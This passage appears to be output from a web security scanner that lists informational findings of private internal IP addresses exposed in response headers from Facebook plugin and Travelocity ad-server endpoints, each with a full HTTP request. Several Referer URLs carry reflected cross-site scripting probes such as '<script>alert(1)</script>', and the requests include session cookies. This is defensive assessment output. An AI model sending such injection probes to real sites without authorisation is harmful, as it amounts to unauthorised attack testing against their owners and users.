Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.54.105.31 (in the X-FB-Server response header)

Request

GET /plugins/like.php?href=http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run&send=false&locale=en_EN&layout=box_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.105.31
X-Cnection: close
Date: Sun, 02 Oct 2011 23:59:50 GMT
Content-Length: 23424

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.118. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.54.123.35 (in the X-FB-Server response header)

Request

GET /plugins/like.php?href=http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run&send=false&locale=en_EN&layout=button_count&width=120&show_faces=true&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.123.35
X-Cnection: close
Date: Sun, 02 Oct 2011 23:58:55 GMT
Content-Length: 23465

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.119. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.64.146.61 (in the X-FB-Server response header)

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fcopley-square.html&layout=standard&show_faces=false&font=arial&action=like&colorscheme=light&locale=en_US&ref=socnet_fb_og_h HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.146.61
X-Cnection: close
Date: Mon, 03 Oct 2011 00:13:26 GMT
Content-Length: 26223

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.120. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhotelplanner&layout=button_count&show_faces=false&width=46&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.129.50
X-Cnection: close
Date: Mon, 03 Oct 2011 00:13:32 GMT
Content-Length: 23478

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.121. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=141597515880090&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e09c0798%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff2ef68ea8c%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.expedia.com%2FBoston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information%3Folacid%3Dhotel.brand.facebook.like&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.72.54
X-Cnection: close
Date: Mon, 03 Oct 2011 01:07:09 GMT
Content-Length: 31434

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.122. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df341a7f6b8%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff3aab797f%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.190.56
X-Cnection: close
Date: Mon, 03 Oct 2011 00:27:24 GMT
Content-Length: 26184

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

23.123. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fmanchesterunited&width=275&connections=0&stream=no&header=no&height=60 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.186.32
X-Cnection: close
Date: Mon, 03 Oct 2011 01:56:37 GMT
Content-Length: 8552

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

23.124. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=120836677942069&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22fd1ef3c%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=false&height=60&id=51212153078&locale=en_US&sdk=joey&show_faces=false&stream=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.119.45
X-Cnection: close
Date: Mon, 03 Oct 2011 00:02:49 GMT
Content-Length: 7701

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

23.125. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fmanchesterunited&width=303&colorscheme=dark&connections=0&stream=no&header=no&height=60 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.110.60
X-Cnection: close
Date: Mon, 03 Oct 2011 01:56:33 GMT
Content-Length: 8605

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

23.126. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=424937091139EAD10A8AF0C7310701E7.p0524; TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; TVLY_LOCALE=us; popunder=yes; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742; mbox=session#1317600481056-80236#1317604116|PC#1317600481056-80236.19#1318811856|check#true#1317602316; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.4.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:13 GMT
Server: Apache
Set-Cookie: JSESSIONID=32EE0BFDF00A186104ECA2853385BA07.p0527; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.61
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2401

var DrfGlobals = {
   sid:"33637923-4b56-4634-b850-17368e8cd432", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f", // publisher id
   pti:"default", // page type id
   src:"none", // source
   
...[SNIP]...

23.127. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=85194181F8EF5609A9FA7C933BC61666.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2401

var DrfGlobals = {
   sid:"bfa7dd53-c988-458c-86df-52443affccb8", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f", // publisher id
   pti:"default", // page type id
   src:"none", // source
   
...[SNIP]...

23.128. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=424937091139EAD10A8AF0C7310701E7.p0524; TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; TVLY_LOCALE=us; popunder=yes; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742; mbox=session#1317600481056-80236#1317604116|PC#1317600481056-80236.19#1318811856|check#true#1317602316; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.4.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:53:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=0A5FCEDBCBBBED69EB649C4587DC58FB.p0526; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.60
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2401

var DrfGlobals = {
   sid:"33637923-4b56-4634-b850-17368e8cd432", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f", // publisher id
   pti:"default", // page type id
   src:"none", // source
   
...[SNIP]...

23.129. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm9d4b7--%3E%3Cscript%3Ealert(1)%3C/script%3Ebbc12be6325&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: drft=33637923-4b56-4634-b850-17368e8cd432; JSESSIONID=CE82F85007B28AF8167D5428864C47CE.p0522; TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; TVLY_LOCALE=us; popunder=yes; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.4.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; drft=33637923-4b56-4634-b850-17368e8cd432; mbox=session#1317600481056-80236#1317605007|PC#1317600481056-80236.19#1318812747|check#true#1317603207

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:53:18 GMT
Server: Apache
Set-Cookie: JSESSIONID=87BA20EA585EE31DDE71FC7109F4F38D.p0524; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.58
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2401

var DrfGlobals = {
   sid:"33637923-4b56-4634-b850-17368e8cd432", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f", // publisher id
   pti:"default", // page type id
   src:"none", // source
   
...[SNIP]...

23.130. http://xml.premierleague.com/crossDomain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xml.premierleague.com
Path:   /crossDomain.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /crossDomain.html HTTP/1.1
Host: xml.premierleague.com
